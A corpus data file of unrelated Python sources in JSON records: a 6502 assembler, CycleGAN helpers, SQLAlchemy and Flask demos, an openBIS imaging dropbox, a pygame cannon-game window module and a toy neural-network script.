'ABSX': 'null'},\r\n 'PHP': {'SNGL': '08', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'PLA': {'SNGL': '68', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'PLP': {'SNGL': '28', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'ROL': {'SNGL': '2a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '36', 'ABS': '2e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '26', 'ABSX': '3e'},\r\n 'ROR': {'SNGL': '6a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '76', 'ABS': '6e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '66', 'ABSX': '7e'},\r\n 'RTI': {'SNGL': '40', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'RTS': {'SNGL': '60', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'SBC': {'SNGL': 'null', 'INDY': 'f1', 'IMM': 'e9', 'INDX': 'e1', 'ZPX': 'f5', 'ABS': 'ed', 'ABSY': 'f9', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'e5', 'ABSX': 'fd'},\r\n 'SEC': {'SNGL': '38', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'SED': {'SNGL': 'f8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'SEI': {'SNGL': '78', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'STA': {'SNGL': 'null', 'INDY': '91', 'IMM': 'null', 'INDX': '81', 'ZPX': '95', 'ABS': '8d', 'ABSY': '99', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '85', 'ABSX': '9d'},\r\n 'STX': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '8e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': '96', 'IND': 'null', 'ZP': '86', 'ABSX': 'null'},\r\n 'STY': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '94', 'ABS': '8c', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '84', 'ABSX': 'null'},\r\n 'TAX': {'SNGL': 'aa', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TAY': {'SNGL': 'a8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TSX': {'SNGL': 'ba', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TXA': {'SNGL': '8a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TXS': {'SNGL': '9a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TYA': {'SNGL': '98', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'WDM': {'SNGL': 'null', 'INDY': 'null', 'IMM': '42', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '42', 'ABSX': 'null'},\r\n}\r\n\r\n# for negative hex values\r\ndef toHex(val, nbits):\r\n return hex((val + (1 << nbits)) % (1 << nbits))\r\n\r\ntwoByteAddress = re.compile('\\$[0-9]{4}')\r\n\r\nfileName = input('Select an assembly file: ')\r\nfile = open(fileName, 'r')\r\n\r\nbytePosition = 0\r\nprocessedLines = []\r\nlabels = {}\r\n\r\n# loop to get positions of labels \r\nfor line in file:\r\n # strip comments and newlines\r\n commentStart = line.find(';')\r\n if (commentStart != -1):\r\n line = line[0:commentStart]\r\n line = line.strip()\r\n if (line):\r\n splitLine = line.split(' ')\r\n arguments = len(splitLine)\r\n processedLines.append({'data': splitLine, 'length': arguments, 'bytePosition': bytePosition})\r\n # we have a label AND an opcode AND an address on this line\r\n if (arguments == 3 and splitLine[0].endswith(':')):\r\n # remove colon before adding it to labels\r\n labels[splitLine[0][:-1]] = bytePosition\r\n if (twoByteAddress.search(splitLine[2])):\r\n bytePosition += 3\r\n else:\r\n bytePosition += 2\r\n\r\n elif (arguments == 2):\r\n # label and implicitly addressed opcode\r\n if (splitLine[0].endswith(':')):\r\n # remove colon before adding it to labels\r\n labels[splitLine[0][:-1]] = bytePosition\r\n bytePosition += 1\r\n # opcode and address\r\n else:\r\n if (twoByteAddress.search(splitLine[1])):\r\n bytePosition += 3\r\n else:\r\n bytePosition += 2\r\n\r\n elif (arguments == 1):\r\n # just a label\r\n if (splitLine[0].endswith(':')):\r\n # remove colon before adding it to labels\r\n labels[splitLine[0][:-1]] = bytePosition\r\n # just an implicitly addressed opcode\r\n else:\r\n bytePosition += 1\r\n else:\r\n continue\r\n\r\nbytePosition = 0\r\nhexOutput = \"\"\r\n# loop to actually convert\r\nfor line in processedLines:\r\n # take the labels out of lines\r\n if (line['data'][0].endswith(':')):\r\n line['length'] -= 1\r\n line['data'] = line['data'][1:]\r\n\r\n # only process lines that aren't just labels\r\n if(line['length'] > 0):\r\n opcode = line['data'][0]\r\n address = 'null'\r\n if (line['length']) == 2:\r\n address = line['data'][1]\r\n\r\n if (opcode in opcodes.keys()):\r\n # implicit\r\n if (line['length'] == 1):\r\n print(opcodes[opcode]['SNGL'])\r\n hexOutput += (opcodes[opcode]['SNGL']) + ' '\r\n elif (line['length'] == 2):\r\n # immediate\r\n if(address.startswith('#')):\r\n print(opcodes[opcode]['IMM'] + ' ' + address[2:])\r\n hexOutput += opcodes[opcode]['IMM'] + ' ' + address[2:] + ' '\r\n elif (address.startswith('(')):\r\n # indexed indirect\r\n if address[4] == ',':\r\n print(opcodes[opcode]['INDX'] + ' ' + address[2:4])\r\n hexOutput += opcodes[opcode]['INDX'] + ' ' + address[2:4] + ' '\r\n # indirect index\r\n elif address[5] == ',':\r\n print(opcodes[opcode]['INDY'] + ' ' + address[2:4])\r\n hexOutput += opcodes[opcode]['INDY'] + ' ' + address[2:4] + ' '\r\n # indirect\r\n else:\r\n print(opcodes[opcode]['IND'] + ' ' + address[4:6] + ' ' + address[2:4])\r\n hexOutput += opcodes[opcode]['IND'] + ' ' + address[4:6] + ' ' + address[2:4] + ' '\r\n elif (address.startswith('$')):\r\n operandLength = len(address)\r\n # absolute X and Y\r\n if (operandLength == 7):\r\n mode = 'ABS' + address[6].upper()\r\n print(opcodes[opcode][mode] + ' ' + address[3:5] + ' ' + address[1:3])\r\n hexOutput += opcodes[opcode][mode] + ' ' + address[3:5] + ' ' + address[1:3] + ' '\r\n # zero page\r\n elif (operandLength == 3):\r\n print(opcodes[opcode]['ZP'] + ' ' + address[1:])\r\n hexOutput += opcodes[opcode]['ZP'] + ' ' + address[1:] + ' '\r\n # zero page X and Y\r\n elif (address[3] == ','):\r\n mode = 'ZP' + address[4].upper()\r\n print(opcodes[opcode][mode] + ' ' + address[1:3])\r\n hexOutput += opcodes[opcode][mode] + ' ' + address[1:3] + ' '\r\n # absolute\r\n else:\r\n print(opcodes[opcode]['ABS'] + ' ' + address[3:] + ' ' + address[1:3])\r\n hexOutput += opcodes[opcode]['ABS'] + ' ' + address[3:] + ' ' + address[1:3] + ' '\r\n elif (address in labels.keys()):\r\n # relative addressing with label\r\n byteDiff = labels[address] - line['bytePosition'] - 2 # subtract one to \r\n print(opcodes[opcode]['BRA'] + ' ' + toHex(byteDiff, 8)[2:])\r\n hexOutput += opcodes[opcode]['BRA'] + ' ' + toHex(byteDiff, 8)[2:] + ' '\r\n else:\r\n print('What the fuck?\\nProblem with line: ', line)\r\n break\r\n else:\r\n print('Invalid line length')\r\n else:\r\n print('No opcode found')\r\n break\r\n\r\nprint(hexOutput.strip())","sub_path":"nes-pratool/translator/assembly-to-hex.py","file_name":"assembly-to-hex.py","file_ext":"py","file_size_in_byte":17123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"362556581","text":"# helper functions for saving sample data and models\n\n# import data loading libraries\nimport os\nimport pdb\nimport pickle\nimport argparse\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# import torch\nimport torch\n\n# numpy & scipy imports\nimport numpy as np\nimport scipy\nimport imageio\n\ndef checkpoint(iteration, G_XtoY, G_YtoX, D_X, D_Y, checkpoint_dir='checkpoints_cyclegan'):\n \"\"\"Saves the parameters of both generators G_YtoX, G_XtoY and discriminators D_X, D_Y.\n \"\"\"\n G_XtoY_path = os.path.join(checkpoint_dir, 'G_XtoY.pkl')\n G_YtoX_path = os.path.join(checkpoint_dir, 'G_YtoX.pkl')\n D_X_path = os.path.join(checkpoint_dir, 'D_X.pkl')\n D_Y_path = os.path.join(checkpoint_dir, 'D_Y.pkl')\n torch.save(G_XtoY.state_dict(), G_XtoY_path)\n torch.save(G_YtoX.state_dict(), G_YtoX_path)\n torch.save(D_X.state_dict(), D_X_path)\n torch.save(D_Y.state_dict(), D_Y_path)\n\n\ndef merge_images(sources, targets, batch_size=16):\n \"\"\"Creates a grid consisting of pairs of columns, where the first column in\n each pair contains images source images and the second column in each pair\n contains images generated by the CycleGAN from the corresponding images in\n the first column.\n \"\"\"\n _, _, h, w = sources.shape\n row = int(np.sqrt(batch_size))\n merged = np.zeros([3, row*h, row*w*2])\n for idx, (s, t) in enumerate(zip(sources, targets)):\n i = idx // row\n j = idx % row\n merged[:, i*h:(i+1)*h, (j*2)*h:(j*2+1)*h] = s\n merged[:, i*h:(i+1)*h, (j*2+1)*h:(j*2+2)*h] = t\n merged = merged.transpose(1, 2, 0)\n return merged\n \n\ndef to_data(x):\n \"\"\"Converts variable to numpy.\"\"\"\n if torch.cuda.is_available():\n x = x.cpu()\n x = x.data.numpy()\n x = ((x +1)*255 / (2)).astype(np.uint8) # rescale to 0-255\n return x\n\ndef save_samples(iteration, fixed_Y, fixed_X, G_YtoX, G_XtoY, batch_size=16, sample_dir='../samples/summer2winter'):\n \"\"\"Saves samples from both generators X->Y and Y->X.\n \"\"\"\n # move input data to correct device\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n fake_X = G_YtoX(fixed_Y.to(device))\n fake_Y = G_XtoY(fixed_X.to(device))\n \n X, fake_X = to_data(fixed_X), to_data(fake_X)\n Y, fake_Y = to_data(fixed_Y), to_data(fake_Y)\n \n merged = (255 - merge_images(X, fake_Y, batch_size)).astype(np.uint8)\n path = os.path.join(sample_dir, 'sample-{:06d}-X-Y.png'.format(iteration))\n imageio.imwrite(path, merged)\n \n merged = 255 - merge_images(Y, fake_X, batch_size).astype(np.uint8)\n path = os.path.join(sample_dir, 'sample-{:06d}-Y-X.png'.format(iteration))\n imageio.imwrite(path, merged)\n \n \nclass ReplayBuffer():\n def __init__(self, max_size=50):\n assert (max_size > 0), 'Empty buffer or trying to create a black hole. Be careful.'\n self.max_size = max_size\n self.data = []\n\n def push_and_pop(self, data):\n to_return = []\n for element in data.data:\n element = torch.unsqueeze(element, 0)\n if len(self.data) < self.max_size:\n self.data.append(element)\n to_return.append(element)\n else:\n if random.uniform(0,1) > 0.5:\n i = random.randint(0, self.max_size-1)\n to_return.append(self.data[i].clone())\n self.data[i] = element\n else:\n to_return.append(element)\n return Variable(torch.cat(to_return))\n","sub_path":"03-CycleGAN/src/.ipynb_checkpoints/helpers-checkpoint.py","file_name":"helpers-checkpoint.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"427979129","text":"from sqlalchemy import (\n create_engine, Column, Integer, String\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n\n# executing the instruction from the \"chinook\" database\n# /// == localhost (chinook)\ndb = create_engine(\"postgresql:///chinook\")\nbase = declarative_base()\n\n# create a class-based model for the \"Programmer\" table\nclass Programmer(base):\n __tablename__ = \"Programmer\"\n id = Column(Integer, primary_key=True)\n first_name = Column(String)\n last_name = Column(String)\n gender = Column(String)\n nationallity = Column(String)\n famous_for = Column(String)\n\n\n# instead of connection to the database directly we will ask for a session\n# create a new instance of sessionmaker, then point to our engine (the db)\nSession = sessionmaker(db)\n# opens an actual session by calling the Session() subclass defined above\nsession = Session()\n\n# creating the database using the declarative_base subclass\nbase.metadata.create_all(db)\n\n# creating records on our Programmer table\nada_lovelace = Programmer(\n first_name=\"Ada\",\n last_name=\"Lovelace\",\n gender=\"F\",\n nationality=\"Brittish\",\n famous_for=\"First Programmer\"\n)\n\n# add each instance of our programmers to our session\nsession.add(ada_lovelace)\n\n# commit our session to the database\nsession.commit()\n\n# query the databse to find all programmers \nprogrammers = session.query(Programmer)\nfor programmer in programmers:\n print(\n programmer.id,\n programmer.first_name + \" \" + programmer.last_name,\n programmer.gender,\n programmer.nationality,\n programmer.famous_for,\n sep=\" | \"\n )","sub_path":"sql-crud.py","file_name":"sql-crud.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"155818387","text":"import os\nfrom ch.systemsx.cisd.openbis.dss.etl.dto.api import ChannelColor\nfrom ch.systemsx.cisd.openbis.dss.etl.dto.api import SimpleImageDataConfig\nfrom ch.systemsx.cisd.openbis.dss.etl.dto.api import ImageMetadata\nfrom ch.systemsx.cisd.openbis.plugin.screening.shared.api.v1.dto import Geometry\n\nSPACE_CODE = \"TEST\"\nPROJECT_CODE = \"TEST-PROJECT\"\nPROJECT_ID = \"/%(SPACE_CODE)s/%(PROJECT_CODE)s\" % vars()\nEXPERIMENT_CODE = \"DEMO-EXP-HCS\"\nEXPERIMENT_ID = \"/%(SPACE_CODE)s/%(PROJECT_CODE)s/%(EXPERIMENT_CODE)s\" % vars()\n\nPLATE_CODE = \"PLATE\"\nPLATE_ID = \"/%(SPACE_CODE)s/%(PLATE_CODE)s\" % vars()\nPLATE_ID_WITH_PROJECT = \"/%(SPACE_CODE)s/%(PROJECT_CODE)s/%(PLATE_CODE)s\" % vars()\nPLATE_GEOMETRY_PROPERTY_CODE = \"$PLATE_GEOMETRY\"\nPLATE_GEOMETRY = \"384_WELLS_16X24\"\n\n\ndef create_space_if_needed(transaction):\n space = transaction.getSpace(SPACE_CODE)\n if None == space:\n space = transaction.createNewSpace(SPACE_CODE, None)\n transaction.getLogger().info('Creating new space: ' + SPACE_CODE)\n space.setDescription(\"A demo space\")\n\ndef create_project_if_needed(transaction):\n project = transaction.getProject(PROJECT_ID)\n if None == project:\n create_space_if_needed(transaction)\n project = transaction.createNewProject(PROJECT_ID)\n transaction.getLogger().info('Creating new project: ' + PROJECT_ID)\n project.setDescription(\"A demo project\")\n \ndef create_experiment_if_needed(transaction):\n \"\"\" Get the specified experiment or register it if necessary \"\"\"\n exp = transaction.getExperiment(EXPERIMENT_ID)\n if None == exp:\n create_project_if_needed(transaction)\n transaction.getLogger().info('Creating new experiment: ' + EXPERIMENT_ID)\n exp = transaction.createNewExperiment(EXPERIMENT_ID, 'SIRNA_HCS')\n \n return exp\n \ndef create_plate_if_needed(transaction):\n \"\"\" Get the specified sample or register it if necessary \"\"\"\n if transaction.serverInformation.get('project-samples-enabled') == 'true':\n plate_id = PLATE_ID_WITH_PROJECT\n else:\n plate_id = PLATE_ID\n\n samp = transaction.getSample(plate_id)\n\n if None == samp:\n exp = create_experiment_if_needed(transaction)\n samp = transaction.createNewSample(plate_id, 'PLATE')\n transaction.getLogger().info('Creating new plate: ' + plate_id)\n samp.setPropertyValue(PLATE_GEOMETRY_PROPERTY_CODE, PLATE_GEOMETRY)\n samp.setExperiment(exp)\n \n return samp\n\n \nclass MyImageDataSetConfig(SimpleImageDataConfig):\n def extractImageMetadata(self, imagePath):\n \n basename = os.path.splitext(imagePath)[0]\n (plate, well, tile, channelCode) = basename.split(\"_\")\n \n image_tokens = ImageMetadata()\n image_tokens.well = well\n try:\n image_tokens.tileNumber = int(tile)\n except ValueError:\n raise Exception(\"Cannot parse field number from '\" + tile + \"' in '\" + basename + \"' file name.\")\n \n image_tokens.channelCode = channelCode\n return image_tokens\n \n def getChannelColor(self, channelCode):\n dict = { \"GFP\" : ChannelColor.GREEN, \"DAPI\" : ChannelColor.BLUE, \"CY3\" : ChannelColor.RED }\n if channelCode in dict:\n return dict[channelCode]\n else:\n return None \n \n def getTileGeometry(self, imageTokens, maxTileNumber):\n return Geometry.createFromRowColDimensions(maxTileNumber / 3, 3) \n\ndef process(transaction): \n incoming = transaction.getIncoming()\n if incoming.isDirectory():\n imageDataset = MyImageDataSetConfig()\n imageDataset.setRawImageDatasetType()\n imageDataset.setGenerateThumbnails(True)\n imageDataset.setUseImageMagicToGenerateThumbnails(False)\n imageDataset.addGeneratedImageRepresentationWithResolution(\"512x512\")\n plate = create_plate_if_needed(transaction)\n dataset = transaction.createNewImageDataSet(imageDataset, incoming);\n dataset.setSample(plate)\n transaction.moveFile(incoming.getPath(), dataset);\n","sub_path":"screening/source/core-plugins/screening/4/dss/drop-boxes/hcs-dropbox/hcs-dropbox.py","file_name":"hcs-dropbox.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67881069","text":"from datetime import datetime\n\nimport requests\nfrom exchanges import settings\n\n\nproxies = getattr(settings, 'PROXIES', None)\n\nproxies = dict(\n http=\"172.16.51.174:8118\",\n https=\"172.16.51.174:8118\",\n)\n\n\ndef get_datetime():\n return datetime.now().strftime('%Y-%m-%d')\n\n\ndef get_response(url):\n response = requests.get(url, proxies=proxies, timeout=5)\n response.raise_for_status()\n return response.json()\n","sub_path":"exchanges/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446833725","text":"from scipy import misc\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nclass Layer:\n def __init__(self, W, b, f):\n self._W = W\n self._b = b\n self._f = f\n\n def propagate_forward(self, x):\n return self._f(self._W @ x + self._b)\n\ndef sigmoid(s):\n return 1 / (1 + np.exp(-s))\n\nif __name__ == '__main__':\n # input\n x = misc.imread('img/9.png', flatten = True).flatten()\n x = x.reshape((len(x), 1))\n print('---- x -----')\n print(x)\n\n # layer1\n n_output_1 = len(x)\n W1 = np.random.randn(n_output_1, len(x))\n b1 = np.random.randn(n_output_1, 1)\n layer1 = Layer(W1, b1, sigmoid)\n\n # layer2\n n_output_2 = 10\n W2 = np.random.randn(n_output_2, n_output_1)\n b2 = np.random.randn(n_output_2, 1)\n layer2 = Layer(W2, b2, sigmoid)\n\n y1 = layer1.propagate_forward(x)\n y2 = layer2.propagate_forward(x)\n\n hist_W1, bins_W1 = np.histogram(W1.flatten())\n hist_W2, bins_W2 = np.histogram(W2.flatten())\n\n index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n plt.title('Predication')\n plt.bar(index, y2.flatten(), align='center')\n plt.xticks(index, index)\n plt.show()\n","sub_path":"tacamula/layered_neuron.py","file_name":"layered_neuron.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"589289080","text":"import pygame\r\nfrom Game_math import Rectangle, Point\r\n\r\n\r\ndef color_txt_changer(color_index, color_change_delta, lighting, fogging):\r\n if lighting:\r\n if color_index + color_change_delta <= 255:\r\n color_index += color_change_delta\r\n else:\r\n lighting = False\r\n fogging = True\r\n\r\n if fogging:\r\n if color_index - color_change_delta >= 10:\r\n color_index -= color_change_delta\r\n else:\r\n lighting = True\r\n fogging = False\r\n\r\n return color_index, lighting, fogging\r\n\r\nclass Start_window:\r\n def __init__(self, screen, screen_width, screen_height, image, FPS_index, cannon_level):\r\n self.__window_width = screen_width\r\n self.__window_height = screen_height\r\n self.__screen = screen\r\n self.cannon_level = cannon_level\r\n self.__image = pygame.image.load(image)\r\n self.__flashing_txt_color_index = 0\r\n self.__color_change_delta = int(255 / (FPS_index))\r\n self.__fogging = False\r\n self.__lighting = True \r\n\r\n def draw_start_window(self):\r\n self.__draw_game_title()\r\n self.__draw_cannon_level_index()\r\n self.__draw_cannon_for_start_window()\r\n self.__draw_flashing_txt_for_start()\r\n # self.__draw_button_for_resetting_the_game()\r\n\r\n def __draw_game_title(self):\r\n self.__fontobj = pygame.font.SysFont('Agency FB', 40)\r\n self.__txt_image_for_name = self.__fontobj.render('CANNON GAME', True, (0, 2, 2))\r\n # self.__txt_rect_for_name = self.__txt_image_for_name.get_rect(center=(self.__window_width / 2, 50))\r\n self.__txt_rect_for_name = self.__txt_image_for_name.get_rect(center=(250, 50))\r\n self.__screen.blit(self.__txt_image_for_name, self.__txt_rect_for_name)\r\n\r\n def __draw_cannon_level_index(self):\r\n self.__txt_image_for_cannon_level = self.__fontobj.render('Cannon level: ' + str(self.cannon_level), True,\r\n (0, 2, 2))\r\n self.__txt_rect_for_cannon_level = self.__txt_image_for_cannon_level.get_rect(center=(self.__window_width\r\n / 2, 100))\r\n self.__screen.blit(self.__txt_image_for_cannon_level, self.__txt_rect_for_cannon_level)\r\n\r\n def __draw_cannon_for_start_window(self):\r\n self.__scale_image = pygame.transform.scale(self.__image, (int(self.__image.get_width() // 6),\r\n int(self.__image.get_height() // 6)))\r\n self.__image_rect = self.__scale_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2 - 50))\r\n self.__screen.blit(self.__scale_image, self.__image_rect)\r\n\r\n def __draw_flashing_txt_for_start(self):\r\n txt = 'TAP TO START'\r\n self.__flashing_txt_color_index, self.__lighting, self.__fogging = \\\r\n color_txt_changer(self.__flashing_txt_color_index, self.__color_change_delta,\r\n self.__lighting, self.__fogging)\r\n self.__fontobj = pygame.font.SysFont('Agency FB', 40)\r\n self.__txt_image = self.__fontobj.render(txt, True, (self.__flashing_txt_color_index,\r\n self.__flashing_txt_color_index,\r\n self.__flashing_txt_color_index))\r\n self.__txt_rect_for_name = self.__txt_image.get_rect(center=(self.__window_width / 2,\r\n self.__window_height - 150))\r\n self.__screen.blit(self.__txt_image, self.__txt_rect_for_name)\r\n\r\n def __draw_button_for_resetting_the_game(self):\r\n pygame.draw.rect(self.__screen, (129, 129, 129),\r\n (self.__button.x, self.__button.y, self.__button.width, self.__button.height))\r\n fontobj = pygame.font.SysFont('Agency FB', 40)\r\n txt_image = fontobj.render('reset the game', True, (0, 0, 0))\r\n txt_rect = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2))\r\n self.__screen.blit(txt_image, txt_rect)\r\n\r\n\r\nclass Finish_window:\r\n def __init__(self, __screen, screen_width, screen_height, score, FPS_index, cannon_level, upgrade_cost):\r\n self.__window_width = screen_width\r\n self.__window_height = screen_height\r\n self.__screen = __screen\r\n self.__score = score\r\n self.__flashing_txt_color_index = 0\r\n self.__color_change_delta = int(255 / (FPS_index))\r\n self.__fogging = False\r\n self.__lighting = True\r\n self.__fontobj = pygame.font.SysFont('Agency FB', 40)\r\n self.upgrade_cost = upgrade_cost\r\n self.cannon_level = cannon_level\r\n self.__button = Rectangle(self.__window_width / 2 - 65, self.__window_height / 2 - 25, 130, 50)\r\n \r\n def draw_finish_window(self, mouse_button_down, click_event, complete_level):\r\n # отрисовка заднего фона\r\n pygame.draw.rect(self.__screen, (255, 255, 255), (0, 0, self.__window_width, self.__window_height))\r\n if complete_level:\r\n self.__draw_complete_level()\r\n self.__draw_score()\r\n self.__draw_flashing_txt_for_finish_window()\r\n self.__draw_button_for_imrove_cannon(mouse_button_down, click_event)\r\n self.__draw_cannon_level()\r\n self.__draw_upgrade_cost()\r\n\r\n def __draw_complete_level(self):\r\n txt = 'level complete'\r\n txt_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n txt_rect_for_name = txt_image.get_rect(midtop=(self.__window_width / 2, 7))\r\n self.__screen.blit(txt_image, txt_rect_for_name)\r\n\r\n def __draw_score(self):\r\n txt = 'SCORE ' + str(self.__score)\r\n txt_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n txt_rect_for_name = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2 - 200))\r\n self.__screen.blit(txt_image, txt_rect_for_name)\r\n\r\n def __draw_cannon_level(self):\r\n txt = 'CANNON LEVEL: ' + str(self.cannon_level)\r\n txt_cannon_level_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n txt_rect_for_cannon_level = txt_cannon_level_image.get_rect(center=(self.__window_width / 2,\r\n self.__window_height / 2 - 100))\r\n self.__screen.blit(txt_cannon_level_image, txt_rect_for_cannon_level)\r\n\r\n def __draw_upgrade_cost(self):\r\n txt = 'UPGRADE PRICE: ' + str(self.upgrade_cost)\r\n txt_cannon_level_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n txt_rect_for_cannon_level = txt_cannon_level_image.get_rect(center=(self.__window_width / 2,\r\n self.__window_height / 2 - 150))\r\n self.__screen.blit(txt_cannon_level_image, txt_rect_for_cannon_level)\r\n\r\n def __draw_flashing_txt_for_finish_window(self):\r\n txt = 'TAP TO RESTART'\r\n self.__flashing_txt_color_index, self.__lighting, self.__fogging = \\\r\n color_txt_changer(self.__flashing_txt_color_index, self.__color_change_delta,\r\n self.__lighting, self.__fogging)\r\n txt_image = self.__fontobj.render(txt, True, (self.__flashing_txt_color_index, self.__flashing_txt_color_index,\r\n self.__flashing_txt_color_index))\r\n txt_rect_for_name = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height - 100))\r\n self.__screen.blit(txt_image, txt_rect_for_name)\r\n\r\n def the_mouse_intercect_the_button(self, mouse_pos):\r\n if self.__button.x + self.__button.width < mouse_pos[0] or mouse_pos[0] < self.__button.x:\r\n return False\r\n if self.__button.y + self.__button.height < mouse_pos[1] or mouse_pos[1] < self.__button.y:\r\n return False\r\n return True\r\n \r\n def __draw_button_for_imrove_cannon(self, mouse_pos, click_event):\r\n pygame.draw.rect(self.__screen, (129, 129, 129), (self.__button.x, self.__button.y, self.__button.width,\r\n self.__button.height))\r\n fontobj = pygame.font.SysFont('Agency FB', 30)\r\n txt_image = fontobj.render('UPGRADE', True, (0, 0, 0))\r\n txt_rect = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2))\r\n self.__screen.blit(txt_image, txt_rect)\r\n # print('UPGRADE')\r\n\r\n","sub_path":"game_windows.py","file_name":"game_windows.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384702334","text":"# Now we also need the request object\n# Also using redirect\nfrom flask import Flask, render_template, request, redirect\nimport pg\n\ndb = pg.DB(dbname='restaurant_db')\n\napp = Flask('MyFormApp')\n\n@app.route('/')\ndef form():\n # Render the form.html template\n return render_template(\n 'form.html',\n title='Enter new project')\n\n# This URL receives the form submit and processes it\n@app.route('/submit_form', methods=['POST'])\ndef submit_form():\n project_name = request.form['project_name']\n project_description = request.form['project_description']\n db.insert('project', name=project_name, description=project_description)\n return redirect('/')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flask_examples/05_flask_with_forms.py","file_name":"05_flask_with_forms.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 